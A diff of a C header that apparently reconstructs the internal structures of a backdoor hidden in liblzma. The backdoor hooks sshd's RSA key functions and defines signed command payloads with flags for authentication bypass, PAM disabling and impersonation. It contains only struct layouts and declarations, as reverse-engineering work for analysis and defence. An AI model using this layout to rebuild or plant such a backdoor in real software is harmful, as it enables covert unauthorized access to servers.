1419 static_assert(sizeof(struct audit_ifaces) == 0x48);
+
1420 assert_offset(ldso_ctx_t, libcrypto_l_name, 0xF8);
+
1421 assert_offset(ldso_ctx_t, _dl_audit_symbind_alt, 0x100);
+
1422 assert_offset(ldso_ctx_t, _dl_audit_symbind_alt__size, 0x108);
+
1423 assert_offset(ldso_ctx_t, hook_RSA_public_decrypt, 0x110);
+
1424 assert_offset(ldso_ctx_t, hook_EVP_PKEY_set1_RSA, 0x118);
+
1425 assert_offset(ldso_ctx_t, hook_RSA_get0_key, 0x120);
+
1426 assert_offset(ldso_ctx_t, imported_funcs, 0x128);
+
1427 assert_offset(ldso_ctx_t, hooks_installed, 0x130);
+
1428 static_assert(sizeof(ldso_ctx_t) == 0x138);
+
1429 
+
1430 
+
1431 typedef struct __attribute__((packed)) backdoor_hooks_data {
+
1432  ldso_ctx_t ldso_ctx;
+
1433  global_context_t global_ctx;
+
1434  imported_funcs_t imported_funcs;
+
1435  sshd_ctx_t sshd_ctx;
+
1436  libc_imports_t libc_imports;
+
1437  sshd_log_ctx_t sshd_log_ctx;
+
1438  u64 signed_data_size;
+
1439  u8 signed_data;
+
1440 } backdoor_hooks_data_t;
+
1441 
+
1442 assert_offset(backdoor_hooks_data_t, ldso_ctx, 0);
+
1443 assert_offset(backdoor_hooks_data_t, global_ctx, 0x138);
+
1444 assert_offset(backdoor_hooks_data_t, imported_funcs, 0x2A0);
+
1445 assert_offset(backdoor_hooks_data_t, sshd_ctx, 0x3C8);
+
1446 assert_offset(backdoor_hooks_data_t, libc_imports, 0x4A8);
+
1447 assert_offset(backdoor_hooks_data_t, sshd_log_ctx, 0x518);
+
1448 assert_offset(backdoor_hooks_data_t, signed_data_size, 0x580);
+
1449 assert_offset(backdoor_hooks_data_t, signed_data, 0x588);
+
1450 static_assert(sizeof(backdoor_hooks_data_t) >= 0x589);
+
1451 
+
1452 typedef enum {
+
1453  SYSLOG_LEVEL_QUIET,
+
1454  SYSLOG_LEVEL_FATAL,
+
1455  SYSLOG_LEVEL_ERROR,
+
1456  SYSLOG_LEVEL_INFO,
+
1457  SYSLOG_LEVEL_VERBOSE,
+
1458  SYSLOG_LEVEL_DEBUG1,
+
1459  SYSLOG_LEVEL_DEBUG2,
+
1460  SYSLOG_LEVEL_DEBUG3,
+
1461  SYSLOG_LEVEL_NOT_SET = -1
+
1462 } LogLevel;
+
1463 typedef void (*log_handler_fn)(
+
1464  LogLevel level,
+
1465  int forced,
+
1466  const char *msg,
+
1467  void *ctx);
+
1468 
+
1469 typedef struct __attribute__((packed)) backdoor_hooks_ctx {
+
1470  PADDING(0x30);
+
1471  backdoor_shared_globals_t *shared;
+
1472  backdoor_hooks_data_t **hooks_data_addr;
+
1473  uintptr_t (*symbind64)(
+
1474  Elf64_Sym *sym, unsigned int ndx,
+
1475  uptr *refcook, uptr *defcook,
+
1476  unsigned int flags, const char *symname);
+
1477  pfn_RSA_public_decrypt_t hook_RSA_public_decrypt;
+
1478  pfn_RSA_get0_key_t hook_RSA_get0_key;
+
1479  log_handler_fn mm_log_handler;
+
1480  PADDING(sizeof(void *));
+
1481  PADDING(sizeof(void *));
+
1482  sshd_monitor_func_t mm_answer_keyallowed;
+
1483  sshd_monitor_func_t mm_answer_keyverify;
+
1484  PADDING(sizeof(void *));
+
1485 } backdoor_hooks_ctx_t;
+
1486 
+
1487 assert_offset(backdoor_hooks_ctx_t, shared, 0x30);
+
1488 assert_offset(backdoor_hooks_ctx_t, hooks_data_addr, 0x38);
+
1489 assert_offset(backdoor_hooks_ctx_t, symbind64, 0x40);
+
1490 assert_offset(backdoor_hooks_ctx_t, hook_RSA_public_decrypt, 0x48);
+
1491 assert_offset(backdoor_hooks_ctx_t, hook_RSA_get0_key, 0x50);
+
1492 assert_offset(backdoor_hooks_ctx_t, mm_log_handler, 0x58);
+
1493 assert_offset(backdoor_hooks_ctx_t, mm_answer_keyallowed, 0x70);
+
1494 assert_offset(backdoor_hooks_ctx_t, mm_answer_keyverify, 0x78);
+
1495 static_assert(sizeof(backdoor_hooks_ctx_t) == 0x88);
+
1496 
+
1497 typedef struct __attribute__((packed)) backdoor_setup_params {
+
1498  PADDING(0x8);
+
1499  backdoor_shared_globals_t *shared;
+
1500  backdoor_hooks_ctx_t *hook_params;
+
1501  lzma_check_state dummy_check_state;
+
1502  elf_entry_ctx_t *entry_ctx;
+
1503 } backdoor_setup_params_t;
+
1504 
+
1505 assert_offset(backdoor_setup_params_t, shared, 0x8);
+
1506 assert_offset(backdoor_setup_params_t, hook_params, 0x10);
+
1507 assert_offset(backdoor_setup_params_t, entry_ctx, 0x80);
+
1508 static_assert(sizeof(backdoor_setup_params_t) == 0x88);
+
1509 
+
1514 typedef struct __attribute__((packed)) elf_handles {
+
1519  elf_info_t *main;
+
1525  elf_info_t *dynamic_linker;
+
1526  elf_info_t *libc;
+
1527  elf_info_t *liblzma;
+
1528  elf_info_t *libcrypto;
+
1529 } elf_handles_t;
+
1530 
+
1531 assert_offset(elf_handles_t, main, 0x0);
+
1532 assert_offset(elf_handles_t, dynamic_linker, 0x8);
+
1533 assert_offset(elf_handles_t, libc, 0x10);
+
1534 assert_offset(elf_handles_t, liblzma, 0x18);
+
1535 assert_offset(elf_handles_t, libcrypto, 0x20);
+
1536 static_assert(sizeof(elf_handles_t) == 0x28);
1537 
-
1538 assert_offset(main_elf_t, elf_handles, 0x0);
-
1539 assert_offset(main_elf_t, dynamic_linker_ehdr, 0x8);
-
1540 assert_offset(main_elf_t, __libc_stack_end, 0x10);
-
1541 static_assert(sizeof(main_elf_t) == 0x18);
-
1542 
-
1543 typedef struct backdoor_data backdoor_data_t;
-
1544 
-
1548 typedef struct __attribute__((packed)) backdoor_data_handle {
-
1549  backdoor_data_t *data;
-
1550  elf_handles_t *elf_handles;
-
1551 } backdoor_data_handle_t;
-
1552 
-
1553 assert_offset(backdoor_data_handle_t, data, 0x0);
-
1554 assert_offset(backdoor_data_handle_t, elf_handles, 0x8);
-
1555 
-
1556 typedef struct __attribute__((packed)) string_item {
-
1560  EncodedStringId string_id;
-
1561  PADDING(4);
-
1565  void *func_start;
-
1569  void *func_end;
-
1573  void *xref;
-
1574 } string_item_t;
-
1575 
-
1576 assert_offset(string_item_t, string_id, 0);
-
1577 assert_offset(string_item_t, func_start, 0x8);
-
1578 assert_offset(string_item_t, func_end, 0x10);
-
1579 assert_offset(string_item_t, xref, 0x18);
-
1580 static_assert(sizeof(string_item_t) == 0x20);
+
1538 typedef struct __attribute__((packed)) main_elf {
+
1539  elf_handles_t *elf_handles;
+
1540  Elf64_Ehdr *dynamic_linker_ehdr;
+
1541  void **__libc_stack_end;
+
1542 } main_elf_t;
+
1543 
+
1544 assert_offset(main_elf_t, elf_handles, 0x0);
+
1545 assert_offset(main_elf_t, dynamic_linker_ehdr, 0x8);
+
1546 assert_offset(main_elf_t, __libc_stack_end, 0x10);
+
1547 static_assert(sizeof(main_elf_t) == 0x18);
+
1548 
+
1549 typedef struct backdoor_data backdoor_data_t;
+
1550 
+
1554 typedef struct __attribute__((packed)) backdoor_data_handle {
+
1555  backdoor_data_t *data;
+
1556  elf_handles_t *elf_handles;
+
1557 } backdoor_data_handle_t;
+
1558 
+
1559 assert_offset(backdoor_data_handle_t, data, 0x0);
+
1560 assert_offset(backdoor_data_handle_t, elf_handles, 0x8);
+
1561 
+
1562 typedef struct __attribute__((packed)) string_item {
+
1566  EncodedStringId string_id;
+
1567  PADDING(4);
+
1571  void *func_start;
+
1575  void *func_end;
+
1579  void *xref;
+
1580 } string_item_t;
1581 
-
1582 typedef struct __attribute__((packed)) string_references {
-
1583  string_item_t entries[27];
-
1584  PADDING(0x8);
-
1585 } string_references_t;
-
1586 
-
1587 assert_offset(string_references_t, entries, 0);
-
1588 static_assert(sizeof(string_references_t) == 0x368);
-
1589 
-
1594 typedef struct __attribute__((packed)) backdoor_data {
-
1599  struct link_map *main_map;
-
1604  struct link_map *dynamic_linker_map;
-
1605  struct link_map *liblzma_map;
-
1606  struct link_map *libcrypto_map;
-
1607  struct link_map *libsystemd_map;
-
1608  struct link_map *libc_map;
-
1609 
-
1610  elf_handles_t elf_handles;
-
1611 
-
1612  backdoor_data_handle_t data_handle;
-
1613 
-
1619  elf_info_t main_info;
-
1625  elf_info_t dynamic_linker_info;
-
1629  elf_info_t libc_info;
-
1630  elf_info_t liblzma_info;
-
1634  elf_info_t libcrypto_info;
-
1635 
-
1639  libc_imports_t libc_imports;
-
1644  string_references_t string_refs;
-
1645  PADDING(16);
-
1649  lzma_allocator *import_resolver;
-
1650 } backdoor_data_t;
-
1651 
-
1652 assert_offset(backdoor_data_t, main_map, 0);
-
1653 assert_offset(backdoor_data_t, dynamic_linker_map, 0x8);
-
1654 assert_offset(backdoor_data_t, liblzma_map, 0x10);
-
1655 assert_offset(backdoor_data_t, libcrypto_map, 0x18);
-
1656 assert_offset(backdoor_data_t, libsystemd_map, 0x20);
-
1657 assert_offset(backdoor_data_t, libc_map, 0x28);
-
1658 assert_offset(backdoor_data_t, elf_handles, 0x30);
-
1659 assert_offset(backdoor_data_t, data_handle, 0x58);
-
1660 assert_offset(backdoor_data_t, main_info, 0x68);
-
1661 assert_offset(backdoor_data_t, dynamic_linker_info, 0x168);
-
1662 assert_offset(backdoor_data_t, libc_info, 0x268);
-
1663 assert_offset(backdoor_data_t, liblzma_info, 0x368);
-
1664 assert_offset(backdoor_data_t, libcrypto_info, 0x468);
-
1665 assert_offset(backdoor_data_t, libc_imports, 0x568);
-
1666 assert_offset(backdoor_data_t, string_refs, 0x5D8);
-
1667 assert_offset(backdoor_data_t, import_resolver, 0x950);
-
1668 static_assert(sizeof(backdoor_data_t) == 0x958);
-
1669 
-
1670 typedef struct __attribute__((packed)) backdoor_shared_libraries_data {
-
1671  backdoor_data_t *data;
-
1672  elf_handles_t *elf_handles;
-
1677  void* RSA_public_decrypt_plt;
-
1682  void* EVP_PKEY_set1_RSA_plt;
-
1687  void* RSA_get0_key_plt;
-
1688  backdoor_hooks_data_t **hooks_data_addr;
-
1689  libc_imports_t *libc_imports;
-
1690 } backdoor_shared_libraries_data_t;
-
1691 
-
1692 assert_offset(backdoor_shared_libraries_data_t, data, 0x0);
-
1693 assert_offset(backdoor_shared_libraries_data_t, elf_handles, 0x8);
-
1694 assert_offset(backdoor_shared_libraries_data_t, RSA_public_decrypt_plt, 0x10);
-
1695 assert_offset(backdoor_shared_libraries_data_t, EVP_PKEY_set1_RSA_plt, 0x18);
-
1696 assert_offset(backdoor_shared_libraries_data_t, RSA_get0_key_plt, 0x20);
-
1697 assert_offset(backdoor_shared_libraries_data_t, hooks_data_addr, 0x28);
-
1698 assert_offset(backdoor_shared_libraries_data_t, libc_imports, 0x30);
-
1699 
-
1706 typedef union {
-
1708  u32 index;
-
1709  struct {
-
1711  u32 bit_index : 3;
-
1713  u32 byte_index : 29;
-
1714  };
-
1715 } secret_data_shift_cursor_t;
-
1716 
-
1717 typedef struct __attribute__((packed)) secret_data_item {
-
1718  u8 *code;
-
1719  secret_data_shift_cursor_t shift_cursor;
-
1720  u32 operation_index;
-
1721  u32 shift_count;
-
1722  u32 index;
-
1723 } secret_data_item_t;
-
1724 
-
1725 assert_offset(secret_data_item_t, code, 0x0);
-
1726 assert_offset(secret_data_item_t, shift_cursor, 0x8);
-
1727 assert_offset(secret_data_item_t, operation_index, 0xC);
-
1728 assert_offset(secret_data_item_t, shift_count, 0x10);
-
1729 assert_offset(secret_data_item_t, index, 0x14);
-
1730 static_assert(sizeof(secret_data_item_t) == 0x18);
-
1731 
-
1737 typedef struct __attribute__((packed)) key_payload_hdr {
-
1738  u32 field_a;
-
1739  u32 field_b;
-
1740  u64 field_c;
-
1741 } key_payload_hdr_t;
-
1742 
-
1743 typedef union __attribute__((packed)) {
-
1744  u8 value[2];
-
1745  u16 size;
-
1746 } u_cmd_arguments_t;
-
1747 
-
1748 typedef struct __attribute__((packed)) cmd_arguments {
-
1749  u8 flags1;
-
1750  u8 flags2;
-
1751  u8 flags3;
-
1752  u_cmd_arguments_t u;
-
1753 } cmd_arguments_t;
-
1754 
-
1755 typedef struct __attribute__((packed)) key_payload_body {
-
1757  u8 signature[0x72];
-
1758  cmd_arguments_t args;
-
1759  u8 data[0x1A1];
-
1760 } key_payload_body_t;
-
1761 
-
1762 assert_offset(key_payload_body_t, args, 0x72);
-
1763 
-
1769 typedef struct __attribute__((packed)) key_payload {
-
1770  key_payload_hdr_t header;
-
1771  key_payload_body_t body;
-
1772 } key_payload_t;
-
1773 
-
1774 enum CommandFlags1 {
-
1778  CMDF_8BYTES = 0x1,
-
1782  CMDF_SETLOGMASK = 0x4,
-
1786  CMDF_SOCKET_INDEX = 0x20,
-
1790  CMDF_DISABLE_PAM = 0x40,
-
1794  CMDF_NO_EXTENDED_SIZE = 0x80
-
1795 };
-
1796 
-
1797 enum CommandFlags2 {
-
1802  CMDF_IMPERSONATE = 0x1,
-
1807  CMDF_CHANGE_MONITOR_REQ = 0x2,
-
1811  CMDF_AUTH_BYPASS = 0x4,
-
1816  CMDF_CONTINUATION = 0x40,
-
1821  CMDF_PSELECT = 0xC0,
-
1822 
-
1828  CMDF_SOCKFD_MASK = 0x78
-
1829 };
-
1830 
-
1831 enum CommandFlags3 {
-
1835  CMDF_SOCKET_NUM = 0x1F,
-
1839  CMDF_MONITOR_REQ_VAL = 0x3F
-
1840 };
-
1841 
-
1842 assert_offset(cmd_arguments_t, flags1, 0);
-
1843 assert_offset(cmd_arguments_t, flags2, 1);
-
1844 assert_offset(cmd_arguments_t, flags3, 2);
-
1845 assert_offset(cmd_arguments_t, u, 3);
-
1846 static_assert(sizeof(cmd_arguments_t) == 0x5);
-
1847 
-
1848 typedef struct __attribute__((packed)) key_ctx {
-
1849  BIGNUM *rsa_n;
-
1850  BIGNUM *rsa_e;
-
1851  cmd_arguments_t args;
-
1852  key_payload_t payload;
-
1853  PADDING(0x30);
-
1854  PADDING(sizeof(key_payload_hdr_t));
-
1858  u8 decrypted_secret_data[57];
-
1859  PADDING(2);
-
1860 } key_ctx_t;
-
1861 
-
1862 assert_offset(key_ctx_t, rsa_n, 0);
-
1863 assert_offset(key_ctx_t, rsa_e, 0x8);
-
1864 assert_offset(key_ctx_t, args, 0x10);
-
1865 assert_offset(key_ctx_t, payload, 0x15);
-
1866 static_assert(sizeof(key_ctx_t) == 0x2B8);
+
1582 assert_offset(string_item_t, string_id, 0);
+
1583 assert_offset(string_item_t, func_start, 0x8);
+
1584 assert_offset(string_item_t, func_end, 0x10);
+
1585 assert_offset(string_item_t, xref, 0x18);
+
1586 static_assert(sizeof(string_item_t) == 0x20);
+
1587 
+
1588 typedef struct __attribute__((packed)) string_references {
+
1589  string_item_t entries[27];
+
1590  PADDING(0x8);
+
1591 } string_references_t;
+
1592 
+
1593 assert_offset(string_references_t, entries, 0);
+
1594 static_assert(sizeof(string_references_t) == 0x368);
+
1595 
+
1600 typedef struct __attribute__((packed)) backdoor_data {
+
1605  struct link_map *main_map;
+
1610  struct link_map *dynamic_linker_map;
+
1611  struct link_map *liblzma_map;
+
1612  struct link_map *libcrypto_map;
+
1613  struct link_map *libsystemd_map;
+
1614  struct link_map *libc_map;
+
1615 
+
1616  elf_handles_t elf_handles;
+
1617 
+
1618  backdoor_data_handle_t data_handle;
+
1619 
+
1625  elf_info_t main_info;
+
1631  elf_info_t dynamic_linker_info;
+
1635  elf_info_t libc_info;
+
1636  elf_info_t liblzma_info;
+
1640  elf_info_t libcrypto_info;
+
1641 
+
1645  libc_imports_t libc_imports;
+
1650  string_references_t string_refs;
+
1651  PADDING(16);
+
1655  lzma_allocator *import_resolver;
+
1656 } backdoor_data_t;
+
1657 
+
1658 assert_offset(backdoor_data_t, main_map, 0);
+
1659 assert_offset(backdoor_data_t, dynamic_linker_map, 0x8);
+
1660 assert_offset(backdoor_data_t, liblzma_map, 0x10);
+
1661 assert_offset(backdoor_data_t, libcrypto_map, 0x18);
+
1662 assert_offset(backdoor_data_t, libsystemd_map, 0x20);
+
1663 assert_offset(backdoor_data_t, libc_map, 0x28);
+
1664 assert_offset(backdoor_data_t, elf_handles, 0x30);
+
1665 assert_offset(backdoor_data_t, data_handle, 0x58);
+
1666 assert_offset(backdoor_data_t, main_info, 0x68);
+
1667 assert_offset(backdoor_data_t, dynamic_linker_info, 0x168);
+
1668 assert_offset(backdoor_data_t, libc_info, 0x268);
+
1669 assert_offset(backdoor_data_t, liblzma_info, 0x368);
+
1670 assert_offset(backdoor_data_t, libcrypto_info, 0x468);
+
1671 assert_offset(backdoor_data_t, libc_imports, 0x568);
+
1672 assert_offset(backdoor_data_t, string_refs, 0x5D8);
+
1673 assert_offset(backdoor_data_t, import_resolver, 0x950);
+
1674 static_assert(sizeof(backdoor_data_t) == 0x958);
+
1675 
+
1676 typedef struct __attribute__((packed)) backdoor_shared_libraries_data {
+
1677  backdoor_data_t *data;
+
1678  elf_handles_t *elf_handles;
+
1683  void* RSA_public_decrypt_plt;
+
1688  void* EVP_PKEY_set1_RSA_plt;
+
1693  void* RSA_get0_key_plt;
+
1694  backdoor_hooks_data_t **hooks_data_addr;
+
1695  libc_imports_t *libc_imports;
+
1696 } backdoor_shared_libraries_data_t;
+
1697 
+
1698 assert_offset(backdoor_shared_libraries_data_t, data, 0x0);
+
1699 assert_offset(backdoor_shared_libraries_data_t, elf_handles, 0x8);
+
1700 assert_offset(backdoor_shared_libraries_data_t, RSA_public_decrypt_plt, 0x10);
+
1701 assert_offset(backdoor_shared_libraries_data_t, EVP_PKEY_set1_RSA_plt, 0x18);
+
1702 assert_offset(backdoor_shared_libraries_data_t, RSA_get0_key_plt, 0x20);
+
1703 assert_offset(backdoor_shared_libraries_data_t, hooks_data_addr, 0x28);
+
1704 assert_offset(backdoor_shared_libraries_data_t, libc_imports, 0x30);
+
1705 
+
1712 typedef union {
+
1714  u32 index;
+
1715  struct {
+
1717  u32 bit_index : 3;
+
1719  u32 byte_index : 29;
+
1720  };
+
1721 } secret_data_shift_cursor_t;
+
1722 
+
1723 typedef struct __attribute__((packed)) secret_data_item {
+
1724  u8 *code;
+
1725  secret_data_shift_cursor_t shift_cursor;
+
1726  u32 operation_index;
+
1727  u32 shift_count;
+
1728  u32 index;
+
1729 } secret_data_item_t;
+
1730 
+
1731 assert_offset(secret_data_item_t, code, 0x0);
+
1732 assert_offset(secret_data_item_t, shift_cursor, 0x8);
+
1733 assert_offset(secret_data_item_t, operation_index, 0xC);
+
1734 assert_offset(secret_data_item_t, shift_count, 0x10);
+
1735 assert_offset(secret_data_item_t, index, 0x14);
+
1736 static_assert(sizeof(secret_data_item_t) == 0x18);
+
1737 
+
1743 typedef struct __attribute__((packed)) key_payload_hdr {
+
1744  u32 field_a;
+
1745  u32 field_b;
+
1746  u64 field_c;
+
1747 } key_payload_hdr_t;
+
1748 
+
1749 typedef union __attribute__((packed)) {
+
1750  u8 value[2];
+
1751  u16 size;
+
1752 } u_cmd_arguments_t;
+
1753 
+
1754 typedef struct __attribute__((packed)) cmd_arguments {
+
1755  u8 flags1;
+
1756  u8 flags2;
+
1757  u8 flags3;
+
1758  u_cmd_arguments_t u;
+
1759 } cmd_arguments_t;
+
1760 
+
1761 typedef struct __attribute__((packed)) key_payload_body {
+
1763  u8 signature[ED448_SIGNATURE_SIZE];
+
1764  cmd_arguments_t args;
+
1765  u8 data[0x1A1];
+
1766 } key_payload_body_t;
+
1767 
+
1768 assert_offset(key_payload_body_t, args, 0x72);
+
1769 
+
1775 typedef struct __attribute__((packed)) key_payload {
+
1776  key_payload_hdr_t header;
+
1777  key_payload_body_t body;
+
1778 } key_payload_t;
+
1779 static_assert(sizeof(key_payload_t) == 0x228);
+
1780 
+
1781 #define TEST_FLAG(x, flag) (((x) & (flag)) != 0)
+
1782 
+
1783 enum CommandFlags1 {
+
1787  CMDF_8BYTES = 0x1,
+
1791  CMDF_SETLOGMASK = 0x4,
+
1795  CMDF_SOCKET_INDEX = 0x20,
+
1799  CMDF_DISABLE_PAM = 0x40,
+
1803  CMDF_NO_EXTENDED_SIZE = 0x80
+
1804 };
+
1805 
+
1806 enum CommandFlags2 {
+
1811  CMDF_IMPERSONATE = 0x1,
+
1816  CMDF_CHANGE_MONITOR_REQ = 0x2,
+
1820  CMDF_AUTH_BYPASS = 0x4,
+
1825  CMDF_CONTINUATION = 0x40,
+
1830  CMDF_PSELECT = 0xC0,
+
1831 
+
1837  CMDF_SOCKFD_MASK = 0x78
+
1838 };
+
1839 
+
1840 enum CommandFlags3 {
+
1844  CMDF_SOCKET_NUM = 0x1F,
+
1848  CMDF_MONITOR_REQ_VAL = 0x3F
+
1849 };
+
1850 
+
1851 assert_offset(cmd_arguments_t, flags1, 0);
+
1852 assert_offset(cmd_arguments_t, flags2, 1);
+
1853 assert_offset(cmd_arguments_t, flags3, 2);
+
1854 assert_offset(cmd_arguments_t, u, 3);
+
1855 static_assert(sizeof(cmd_arguments_t) == 0x5);
+
1856 
+
1857 typedef struct __attribute__((packed)) key_ctx {
+
1858  const BIGNUM *rsa_n;
+
1859  const BIGNUM *rsa_e;
+
1860  cmd_arguments_t args;
+
1861  key_payload_t payload;
+
1862  PADDING(CHACHA20_KEY_SIZE + CHACHA20_IV_SIZE);
+
1863  u8 ivec[CHACHA20_IV_SIZE];
+
1864  u8 ed448_key[ED448_KEY_SIZE];
+
1865  PADDING(2);
+
1866 } key_ctx_t;
1867 
-
1868 typedef struct __attribute__((packed)) backdoor_cpuid_reloc_consts {
-
1874  ptrdiff_t cpuid_random_symbol_got_offset;
-
1880  u64 cpuid_got_index;
-
1886  ptrdiff_t backdoor_init_stage2_got_offset;
-
1887 } backdoor_cpuid_reloc_consts_t;
-
1888 
-
1889 assert_offset(backdoor_cpuid_reloc_consts_t, cpuid_random_symbol_got_offset, 0);
-
1890 assert_offset(backdoor_cpuid_reloc_consts_t, cpuid_got_index, 0x8);
-
1891 assert_offset(backdoor_cpuid_reloc_consts_t, backdoor_init_stage2_got_offset, 0x10);
-
1892 static_assert(sizeof(backdoor_cpuid_reloc_consts_t) == 0x18);
-
1893 
-
1894 typedef struct __attribute__((packed)) backdoor_tls_get_addr_reloc_consts {
-
1900  ptrdiff_t tls_get_addr_plt_offset;
-
1906  ptrdiff_t tls_get_addr_random_symbol_got_offset;
-
1907 } backdoor_tls_get_addr_reloc_consts_t;
-
1908 
-
1909 assert_offset(backdoor_tls_get_addr_reloc_consts_t, tls_get_addr_plt_offset, 0);
-
1910 assert_offset(backdoor_tls_get_addr_reloc_consts_t, tls_get_addr_random_symbol_got_offset, 0x8);
-
1911 static_assert(sizeof(backdoor_tls_get_addr_reloc_consts_t) == 0x10);
-
1912 
-
1913 typedef struct __attribute__((packed)) elf_functions {
-
1914  PADDING(sizeof(u64));
-
1920  int (*init_hook_functions)(backdoor_hooks_ctx_t *funcs);
-
1921  PADDING(sizeof(u64));
-
1922  PADDING(sizeof(u64));
-
1928  void *(*elf_symbol_get_addr)(elf_info_t *elf_info, EncodedStringId encoded_string_id);
-
1929  PADDING(sizeof(u64));
-
1935  BOOL (*elf_parse)(Elf64_Ehdr *ehdr, elf_info_t *elf_info);
-
1936 } elf_functions_t;
-
1937 
-
1938 assert_offset(elf_functions_t, init_hook_functions, 0x8);
-
1939 assert_offset(elf_functions_t, elf_symbol_get_addr, 0x20);
-
1940 assert_offset(elf_functions_t, elf_parse, 0x30);
-
1941 static_assert(sizeof(elf_functions_t) == 0x38);
-
1942 
-
1943 typedef struct __attribute__((packed)) fake_lzma_allocator {
-
1944  PADDING(sizeof(u64));
-
1945  lzma_allocator allocator;
-
1946 } fake_lzma_allocator_t;
+
1868 assert_offset(key_ctx_t, rsa_n, 0);
+
1869 assert_offset(key_ctx_t, rsa_e, 0x8);
+
1870 assert_offset(key_ctx_t, args, 0x10);
+
1871 assert_offset(key_ctx_t, payload, 0x15);
+
1872 assert_offset(key_ctx_t, ivec, 0x26D);
+
1873 assert_offset(key_ctx_t, ed448_key, 0x27D);
+
1874 
+
1879 typedef struct __attribute__((packed)) monitor_data {
+
1880  u32 cmd_type;
+
1881  PADDING(4);
+
1882  cmd_arguments_t *args;
+
1883  const BIGNUM *rsa_n;
+
1884  const BIGNUM *rsa_e;
+
1885  u8 *payload_body;
+
1886  u16 payload_body_size;
+
1887  PADDING(6);
+
1888  RSA *rsa;
+
1889 } monitor_data_t;
+
1890 
+
1891 assert_offset(monitor_data_t, cmd_type, 0);
+
1892 assert_offset(monitor_data_t, args, 0x8);
+
1893 assert_offset(monitor_data_t, rsa_n, 0x10);
+
1894 assert_offset(monitor_data_t, rsa_e, 0x18);
+
1895 assert_offset(monitor_data_t, payload_body, 0x20);
+
1896 assert_offset(monitor_data_t, payload_body_size, 0x28);
+
1897 assert_offset(monitor_data_t, rsa, 0x30);
+
1898 
+
1903 typedef union __attribute__((packed)) payload {
+
1904  monitor_data_t monitor;
+
1905  u8 data[608];
+
1906 } payload_t;
+
1907 
+
1912 typedef struct __attribute__((packed)) run_backdoor_commands_data {
+
1913  u64 body_size;
+
1914  u32 *p_do_orig;
+
1915  u64 payload_size;
+
1916  u64 hostkey_hash_offset;
+
1917  RSA *rsa;
+
1918  PADDING(8);
+
1919  u8 *ed448_key_ptr;
+
1920  u64 num_keys;
+
1921  PADDING(4);
+
1922  u32 key_cur_idx;
+
1923  u64 key_prev_idx;
+
1924  PADDING(8);
+
1925  u64 num_host_keys;
+
1926  u64 num_host_pubkeys;
+
1927  u8 ed448_key[ED448_KEY_SIZE];
+
1928  PADDING(7);
+
1929  payload_t payload;
+
1930  key_ctx_t kctx;
+
1931 } run_backdoor_commands_data_t;
+
1932 
+
1933 assert_offset(run_backdoor_commands_data_t, body_size, 0);
+
1934 assert_offset(run_backdoor_commands_data_t, p_do_orig, 8);
+
1935 assert_offset(run_backdoor_commands_data_t, payload_size, 0x10);
+
1936 assert_offset(run_backdoor_commands_data_t, hostkey_hash_offset, 0x18);
+
1937 assert_offset(run_backdoor_commands_data_t, rsa, 0x20);
+
1938 assert_offset(run_backdoor_commands_data_t, ed448_key_ptr, 0x30);
+
1939 assert_offset(run_backdoor_commands_data_t, num_keys, 0x38);
+
1940 assert_offset(run_backdoor_commands_data_t, key_cur_idx, 0x44);
+
1941 assert_offset(run_backdoor_commands_data_t, key_prev_idx, 0x48);
+
1942 assert_offset(run_backdoor_commands_data_t, num_host_keys, 0x58);
+
1943 assert_offset(run_backdoor_commands_data_t, num_host_pubkeys, 0x60);
+
1944 assert_offset(run_backdoor_commands_data_t, ed448_key, 0x68);
+
1945 assert_offset(run_backdoor_commands_data_t, payload, 0xA8);
+
1946 assert_offset(run_backdoor_commands_data_t, kctx, 0x308);
1947 
-
1948 assert_offset(fake_lzma_allocator_t, allocator.alloc, 0x8);
-
1949 assert_offset(fake_lzma_allocator_t, allocator.free, 0x10);
-
1950 assert_offset(fake_lzma_allocator_t, allocator.opaque, 0x18);
-
1951 static_assert(sizeof(fake_lzma_allocator_t) == 0x20);
-
1952 
-
1953 typedef struct __attribute__((packed)) instruction_search_ctx
-
1954 {
-
1959  u8 *start_addr;
-
1964  u8 *end_addr;
-
1969  u8 *offset_to_match;
-
1974  u32 *output_register_to_match;
-
1975  u8 *output_register; // TODO unknown
-
1980  BOOL result;
-
1981  PADDING(0x4);
-
1982  backdoor_hooks_data_t *hooks;
-
1983  imported_funcs_t *imported_funcs;
-
1984 } instruction_search_ctx_t;
-
1985 
-
1986 assert_offset(instruction_search_ctx_t, start_addr, 0);
-
1987 assert_offset(instruction_search_ctx_t, end_addr, 0x8);
-
1988 assert_offset(instruction_search_ctx_t, offset_to_match, 0x10);
-
1989 assert_offset(instruction_search_ctx_t, output_register_to_match, 0x18);
-
1990 assert_offset(instruction_search_ctx_t, output_register, 0x20);
-
1991 assert_offset(instruction_search_ctx_t, result, 0x28);
-
1992 assert_offset(instruction_search_ctx_t, hooks, 0x30);
-
1993 assert_offset(instruction_search_ctx_t, imported_funcs, 0x38);
-
1994 static_assert(sizeof(instruction_search_ctx_t) == 0x40);
-
1995 
-
1996 typedef struct __attribute__((packed)) sshd_proxy_args {
-
1997  u32 cmd_type;
-
1998  PADDING(4);
-
1999  cmd_arguments_t *args;
-
2000  const BIGNUM *rsa_n;
-
2001  const BIGNUM *rsa_e;
-
2002  u8 *payload_body;
-
2003  u16 payload_body_size;
-
2004  PADDING(6);
-
2005  RSA *rsa;
-
2006 } sshd_proxy_args_t;
-
2007 
-
2008 assert_offset(sshd_proxy_args_t, cmd_type, 0);
-
2009 assert_offset(sshd_proxy_args_t, args, 0x8);
-
2010 assert_offset(sshd_proxy_args_t, rsa_n, 0x10);
-
2011 assert_offset(sshd_proxy_args_t, rsa_e, 0x18);
-
2012 assert_offset(sshd_proxy_args_t, payload_body, 0x20);
-
2013 assert_offset(sshd_proxy_args_t, payload_body_size, 0x28);
-
2014 assert_offset(sshd_proxy_args_t, rsa, 0x30);
-
2015 
-
2033 extern BOOL sshd_proxy_elevate(sshd_proxy_args_t *args, global_context_t *ctx);
-
2034 
-
2043 extern BOOL x86_dasm(dasm_ctx_t *ctx, u8 *code_start, u8 *code_end);
-
2044 
-
2054 extern BOOL find_call_instruction(u8 *code_start, u8 *code_end, u8 *call_target, dasm_ctx_t *dctx);
-
2055 
-
2064 extern BOOL find_lea_instruction(u8 *code_start, u8 *code_end, u64 displacement);
-
2065 
-
2075 extern BOOL find_instruction_with_mem_operand(
-
2076  u8 *code_start,
-
2077  u8 *code_end,
-
2078  dasm_ctx_t *dctx,
-
2079  void *mem_address
-
2080 );
-
2081 
-
2091 extern BOOL find_lea_instruction_with_mem_operand(
-
2092  u8 *code_start,
-
2093  u8 *code_end,
-
2094  dasm_ctx_t *dctx,
-
